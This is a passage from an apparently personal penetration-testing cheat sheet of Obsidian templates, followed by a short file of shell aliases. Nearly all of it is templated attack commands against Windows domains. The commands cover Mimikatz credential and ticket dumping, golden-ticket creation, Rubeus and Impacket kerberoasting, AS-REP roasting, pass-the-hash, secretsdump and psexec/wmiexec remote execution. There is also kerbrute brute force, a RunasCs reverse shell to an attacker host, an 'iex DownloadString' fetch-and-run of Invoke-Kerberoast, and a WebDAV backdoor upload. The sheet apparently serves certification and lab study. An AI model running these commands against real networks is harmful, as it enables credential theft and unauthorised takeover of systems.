/usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force 513 | 514 | #ntlmv2 515 | hashcat --help | grep -i "ntlm" 516 | hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force 517 | 518 | ``` 519 | 520 | 521 | 522 | 523 | ## Mimikatz & bloodhound & Rubeus 524 | ```powershell 525 | https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49 526 | 527 | # mimikatz 528 | privilege::debug 529 | token::elevate 530 | lsadump::sam 531 | lsadump::lsa 532 | lsadump::secrets 533 | sekurlsa::logonpasswords 534 | lsadump::cache 535 | 536 | .\mimikatz "privilege::debug" "token::elevate" "lsadump::sam " exit 537 | sekurlsa::minidump /users/admin/Desktop/lsass.DMP 538 | sekurlsa::LogonPasswords 539 | 540 | Generate TGT with NTLM 541 | kerberos::golden /domain:<% tp.frontmatter["DOMAIN"] %>/sid: /rc4: /user:<% tp.frontmatter["USERNAME"] %> 542 | 543 | Inject TGT with Mimikatz 544 | kerberos::ptt 545 | 546 | # bloodhound 547 | bloodhound-python -d <% tp.frontmatter["DOMAIN"] %> -u <% tp.frontmatter["USERNAME"] %> -p "<% tp.frontmatter["PASSWORD"] %>" -gc <% tp.frontmatter["DOMAIN"] %> -c all -ns <% tp.frontmatter["RHOST"] %> 548 | bloodhound-python -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> -ns <% tp.frontmatter["RHOST"] %> -c All 549 | bloodhound-python -u <% tp.frontmatter["USERNAME"] %> -p '<% tp.frontmatter["PASSWORD"] %>' -d <% tp.frontmatter["DOMAIN"] %> -dc <% tp.frontmatter["RHOST"] %> -ns <% tp.frontmatter["RHOST"] %> --dns-tcp -no-pass -c ALL --zip 550 | 551 | 552 | # Rubeus 553 | 554 | Overpass the hash 555 | Rubeus.exe kerberoast /user:<% tp.frontmatter["USERNAME"] %> 556 | 557 | Pass the hash 558 | .\Rubeus.exe asktgt /user:Administrator /certificate:7F052EB0D5D122CEF162FAE8233D6A0ED73ADA2E /getcredentials 559 | 560 | RunasCs 561 | ./RunasCs.exe -l 3 -d <% tp.frontmatter["DOMAIN"] %> "<% tp.frontmatter["USERNAME"] %>" '<% tp.frontmatter["PASSWORD"] %>' 'C:\Users\<% tp.frontmatter["USERNAME"] %>\Downloads\.exe' 562 | ./RunasCs.exe -d <% tp.frontmatter["DOMAIN"] %> "<% tp.frontmatter["USERNAME"] %>" '<% tp.frontmatter["PASSWORD"] %>' cmd.exe -r <% tp.frontmatter["LHOST"] %>: 563 | 564 | winexe 565 | winexe -U '<% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %>' //<% tp.frontmatter["RHOST"] %> cmd.exe 566 | winexe -U '<% tp.frontmatter["USERNAME"] %>%<% tp.frontmatter["PASSWORD"] %>' --system //<% tp.frontmatter["RHOST"] %> cmd.exe 567 | ``` 568 | 569 | 570 | 571 | 572 | 573 | 574 | # Impacket 575 | ```bash 576 | impacket-mssqlclient <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> -windows-auth 577 | 578 | psexec.py <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:'<% tp.frontmatter["PASSWORD"] %>'@<% tp.frontmatter["RHOST"] %> 579 | psexec.py -hashes ntlm:ntlm <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 580 | 581 | 582 | wmiexec.py <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:'<% tp.frontmatter["PASSWORD"] %>'@<% tp.frontmatter["RHOST"] %> 583 | wmiexec.py -hashes ntlm:ntlm <% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 584 | 585 | 586 | impacket-getTGT <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> 587 | impacket-getTGT <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %> -dc-ip <% tp.frontmatter["RHOST"] %> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c 588 | 589 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast 590 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %> -request -no-pass -dc-ip <% tp.frontmatter["RHOST"] %> 591 | impacket-GetNPUsers <% tp.frontmatter["RHOST"] %>/ -usersfile usernames.txt -format <% tp.frontmatter["USERNAME"] %> -outputfile hashes 592 | 593 | 594 | export KRB5CCNAME=<% tp.frontmatter["USERNAME"] %>.ccache 595 | impacket-GetUserSPNs <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -k -dc-ip <% tp.frontmatter["RHOST"] %>.<% tp.frontmatter["RHOST"] %> -no-pass -request 596 | 597 | export KRB5CCNAME=<% tp.frontmatter["USERNAME"] %>.ccache 598 | impacket-secretsdump <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> 599 | impacket-secretsdump -k <% tp.frontmatter["RHOST"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %>.<% tp.frontmatter["RHOST"] %> -no-pass -debug 600 | impacket-secretsdump -ntds ndts.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash 601 | impacket-secretsdump -dc-ip <% tp.frontmatter["RHOST"] %> <% tp.frontmatter["RHOST"] %>.LOCAL/svc_bes:<% tp.frontmatter["PASSWORD"] %>@<% tp.frontmatter["RHOST"] %> 602 | impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL 603 | 604 | 605 | ``` 606 | 607 | 608 | # Attacks 609 | 610 | #### Bruteforce 611 | ``` 612 | ./kerbrute -domain <% tp.frontmatter["DOMAIN"] %> -users -passwords -outputfile 613 | .\Rubeus.exe brute /users: /passwords: /domain:<% tp.frontmatter["DOMAIN"] %> /outfile: 614 | .\Rubeus.exe brute /passwords: /outfile: 615 | 616 | ``` 617 | 618 | 619 | #### AsRepRoast 620 | ```bash 621 | # Domain users ( Creds required) 622 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -request -format hashcat -outputfile 623 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -request -format <% tp.frontmatter["USERNAME"] %> -outputfile 624 | 625 | # List of users (No Creds) 626 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/ -usersfile -format hashcat -outputfile 627 | impacket-GetNPUsers <% tp.frontmatter["DOMAIN"] %>/ -usersfile -format <% tp.frontmatter["USERNAME"] %> -outputfile 628 | 629 | 630 | .\Rubeus.exe asreproast /format:hashcat /outfile: 631 | 632 | ``` 633 | 634 | #### Kerberoasting 635 | ```powershell 636 | impacket-GetUserSPNs <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> -outputfile 637 | 638 | .\Rubeus.exe kerberoast /outfile: 639 | 640 | iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1") 641 | 642 | Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII 643 | Invoke-Kerberoast -OutputFormat <% tp.frontmatter["USERNAME"] %> | % { $_.Hash } | Out-File -Encoding ASCII 644 | ``` 645 | 646 | 647 | #### OverPassTheHash / PassTheKey 648 | ```bash 649 | 650 | # Request-TGT 651 | impacket-getTGT <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %> -hashes : 652 | 653 | # Req-TGT with password 654 | impacket-getTGT <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %> 655 | 656 | # Ask and inject TGT 657 | .\Rubeus.exe asktgt /domain:<% tp.frontmatter["DOMAIN"] %> /user:<% tp.frontmatter["USERNAME"] %> /rc4: /ptt 658 | 659 | .\PsExec.exe -accepteula \\<% tp.frontmatter["RHOST"] %> cmd 660 | ``` 661 | 662 | #### Execute commands remotely 663 | 664 | ``` 665 | impacket-psexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 666 | impacket-smbexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 667 | impacket-wmiexec <% tp.frontmatter["DOMAIN"] %>/<% tp.frontmatter["USERNAME"] %>@<% tp.frontmatter["RHOST"] %> -k -no-pass 668 | 669 | 670 | ``` 671 | 672 | 673 | 674 | ### Web 675 | ```bash 676 | 677 | # webdav 678 | davtest [-auth <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>] -move -sendbd auto -url http://<% tp.frontmatter["RHOST"] %> #Uplaod .txt files and try to move it to other extensions 679 | davtest [-auth <% tp.frontmatter["USERNAME"] %>:<% tp.frontmatter["PASSWORD"] %>] -sendbd auto -url http://<% tp.frontmatter["RHOST"] %> #Try to upload every extension 680 | 681 | cadaver <% tp.frontmatter["RHOST"] %> 682 | 683 | 684 | Autorecon 685 | 686 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" 687 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" --dirbuster.tool ffuf 688 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports" --dirbuster.tool ffuf -vv 689 | # if you want to omit portscans of all port if you already have the list! 690 | autorecon <% tp.frontmatter["RHOST"] %> --exclude-tags="dirbuster,top-100-udp-ports,enum4linux,top-tcp-ports,all-tcp-ports" --dirbuster.tool ffuf -vv 691 | ``` 692 | -------------------------------------------------------------------------------- /aliases.md: -------------------------------------------------------------------------------- 1 | ```bash 2 | alias gopwk="cd /mnt/hgfs/oscp" 3 | alias godesk='cd /home/username/Desktop' 4 | alias godown="cd /home/username/Downloads" 5 | alias gohome="cd /home/username/" 6 | alias gops="python -m http.server" 7 | alias gorep="cd /home/username/Repositories" 8 | alias goip="ip -c a | awk '/\/ {sub(/\/.*/, \"\", \$2); gsub(/\x1B\[[0-9;]*[JKmsu]/, \"\", \$2); gsub(/[[:cnt> 9 | alias goims="impacket-smbserver test /home/username -smb2support -user joe -password joe" 10 | alias ..="cd .." 11 | alias c="clear" 12 | alias ...="cd ../.." 13 | alias ....="cd ../../.." 14 | alias .....="cd ../../../.." 15 | alias ctc='xclip -sel clip' # copy to clipboard 16 | alias gotools="cd /home/username/Tools" 17 | ``` 18 | --------------------------------------------------------------------------------